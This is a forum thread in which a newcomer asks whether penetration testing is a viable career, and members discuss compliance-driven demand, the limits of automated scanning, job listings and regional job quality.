Career as a Penetration Tester?

Master Of Puppets

Hi guys,

I am in the beginning of my career in security.I was considering the option of becoming a pen tester because it seems really interesting and something I would enjoy.However, in the past two weeks in which I have been researching the matter I came to the conclusion that this may not be a valid path - the people I talked to and all the info on the internet suggested that the role of the pure pen tester is dead. And of course the fact that it is pretty much automated probably matters. From what I understand the security team can carry out the duties of a pen tester without the need for someone to be appointed just for that. Maybe in a bigger company there would be a place for someone testing the network and searching for vulnerabilities in it?

I guess what I am asking is whether pen testing is something worth going for as a career and if you think there is potential in this field?

Nutsy

MOP,

Let me say first that my career path is not security focused. However, having worked in the credit card industry, to obtain your PCI-DSS compliance you must hire (at the companies expense) outside audits of network security and controls. There are companies out there who do that. The catch is how many are there? I would suggest searching for PCI-DSS audits on your favorite search engine then looking at those companies job postings. I bet what people were saying is that maybe you need a little broader skill set outside of Pen Testing to work for those types of companies. That should give you a good cross reference from what you are hearing to see what skills are needed, and by how many companies there are.
In addition, when you find said Pen Testing company look at the various audit capabilities that they are advertising they can do. Thus, if you find that maybe the financial sector, or casinos, are major companies who utilize Pen Testing, then you can expand your search for more companies based on the acronyms used for those security audits..
Food for thought.

Everyone

Healthcare organizations are another one that are required by law in the US to have regular pen/vuln tests done to meet HIPAA requirements. IIRC they are supposed to have it done twice a year, and can't use the same company more than twice.

Some of the big fortune 500's that are in industries that do not have legal requirements to have this done do still have FTE's who's only job it is to pen test.

Here is a perfect example of such a job listing: https://careers.microsoft.com/jobdetails.aspx?ss=&pg=0&so=&rw=20&jid=105458&jlang=EN&pp=SS

qwertyiop

I'd say just keep on learning. A bunch of the companies that offer pen testing/vulnerability assessments look for people with broad IT experience. For example if your doing a pen test for a client that would like to know what you could do/have done to them you wont always know what kind of environment they may have so the more experience you have with different equipment/OS's the better off you'll be.


An example of a current Pen Tester position is this one https://careers-rapid7.icims.com/jobs/1098/penetration-tester-network-security-consultant/job

Master Of Puppets

Thanks a lot for the replies. They really helped

J_86

I work for a financial institution and we are required to have an outside audit that includes and pen test every year. We also never have then same auditor twice. There are still many jobs like that around.

darkerz

I see a big benefit of this is going to a bar or club and when people ask you, you tell them you are a Certified Penetration Tester.

I had to, come on.

GoodBishop

Or you could get the LPT and say that you are a licensed penetration tester, baby.

Master Of Puppets

Classic

paul78

Master Of Puppets wrote: »

the people I talked to and all the info on the internet suggested that the role of the pure pen tester is dead. And of course the fact that it is pretty much automated probably matters. From what I understand the security team can carry out the duties of a pen tester without the need for someone to be appointed just for that.

The problem with getting "free advice" on the Internet is that you can never really tell if the source is authoritative or just conjecture and opinion.

On that note - I would respectfully but vehemently disagree with your sources.

The notion that penetration testing is dead because of automation shows a clear lack of understanding of the threat vectors that currently exist. There is a tremendous amount of misinformation that penetration testing is entirely network related which can be accomplished with automated network scanners. That's simply untrue as network tools do not focus on applications. And even with the best automated application vulnerability testers available, automated testing cannot account for logic flaws. That requires human intuition and creativity.

Also - penetration testing for physical defences cannot be automated to my knowledge. And neither can social engineering attack testing.

As for the premise that a security team of general analysts can carry out the duties of a pen tester - that's like suggesting that any surgeon which is a medical specialty can perform brain surgery. Just because it's tangentially related or a subset, it doesn't imply that there doesn't need to be specialized skills and/or talents involved. Even with penetration testing, you can focus on different types of penetrating testing such as network, application, social, physical.

In the world generally called security - incident management, forensics, pentesting, governance, regulatory and privacy compliance, risk management, IT controls auditing, etc. etc. are very different roles with specific skills.

Don't mean to sound preachy but since since this is free and anonymous advice - well you get the point

lsud00d

Great points paul...you can't automate the human element in penetration testing.

Humans make mistakes in network, web application, control, and security designs that automated tools might scratch the surface of, but these tools can't combine exploits & payloads, elevate privileges, pivot, or the myriad other combinations that a trained pen tester could possibly do.

Automated tools mainly look for non-SSL connections, signature-based code exploits, directory traversals, SQL/XML/LDAP injections, fuzzing/input validation exploits...basically plug and chug, set it and forget it, review the audits and step into compliance but that doesn't mean you're out of harms way.

Master Of Puppets

Thanks for the advice. Yeah, I had a feeling I need to change my sources

diggitle

https://www.youtube.com/watch?v=4NdXzgKlioQ

scaredoftests

darkerz wrote: »

I see a big benefit of this is going to a bar or club and when people ask you, you tell them you are a Certified Penetration Tester.

I had to, come on.

Funny. Great come-on line.

LionelTeo

Penetration Tester is still a viable route, however, you had to be careful to learn about the inside work on the organization before you joined. And this heavily depends on your location and how mature is the penetration testing field in you area. In my country; from word of mouth, I had friends or heard of friend's friends who work in penetration testing field but ended limit to capable of only performing vulnerability scan and doing reports, to make it worse, all the projects come in all at the same time after financial year, which usually mean during a peak period you had to expect to burn your hours, not on penetration testing, but reports obtain from automated scanning tools. If it still wasn't bad enough, clients may propose to perform penetration test after office hours, this is because they would like to minimize risk of having anything goes wrong during the office hours. Things can still go even worse requiring you to be on site to scan their internal network, and this could be the case for multiple projects you maintained; thus forcing you to travel to multiple sites to set up scanning and spending your office time and weekends doing reports after reports.

This kind of 'penetration testing' is meaningless, as you do not get to employ your skill on doing what you really good at. But this is the general case (in my country) from what I had heard about; but in logic sense this is usually the case because in a tight political environment, nobody in a management would want to be responsible for a server being down, as this could means the end of their job; and not everyone interest in penetration testing is to find vulnerabilities, some do it just to comply with some audit or management, some wants to show as little findings as possible so they can prove they had done a good job, or to sell their business to their client better and give them a false sense of information that their organization is safe; and many more freak out the thought of letting someone obtaining root shells and pivoting. Lack of client understanding eventually limits the project scope to the safest scope ever, a simply vulnerability scanning. Although reporting is important, ideally you would want a penetration testing with 50% skill and %50 report, and not 5% skill and 95% report.

If you truly still interested in penetration testing field, I would encourage to focus more on web penetration testing but still had a good grasp of system penetration testing. Although there is still vulnerability scanner for web application, web application is quite a dynamic environment that a single scanner cannot cover; example like stored XSS, session/cookies hijacking are some of the things that a web scanner cannot cover well. Also, if a company is looking for a web penetration tester and not a generic penetration tester, it usually means that that company understands and requires a person manually verify the vulnerability reported. The chances of you landing in a scanning + reporting wasted job would be much slimmer; and if that company cover web penetration testing, usually they would also cover good solid standard penetration testing and not something like a VA assessment being misunderstood as penetration testing.

Master Of Puppets

^ That's an excellent post!

I was searching the forum for something and I found this thread This was at a time when I was making a final decision about the area I would specialize in. I turned to people with more experience who managed to get me a little confused I am happy to say that I learned a lot of things since then.

Currently, I am in network security which I absolutely love. Web app pen testing has always been interesting to me but I haven't given it much thought as far as having a career in it is concerned so I will make sure to dig into it.

Also, you could not be more right about the maturity of the field in a given area. I wish someone had told me that a few years ago. In my country, the security scene, as a whole, is far from developed. This is one of the reasons I am going to move in a few years.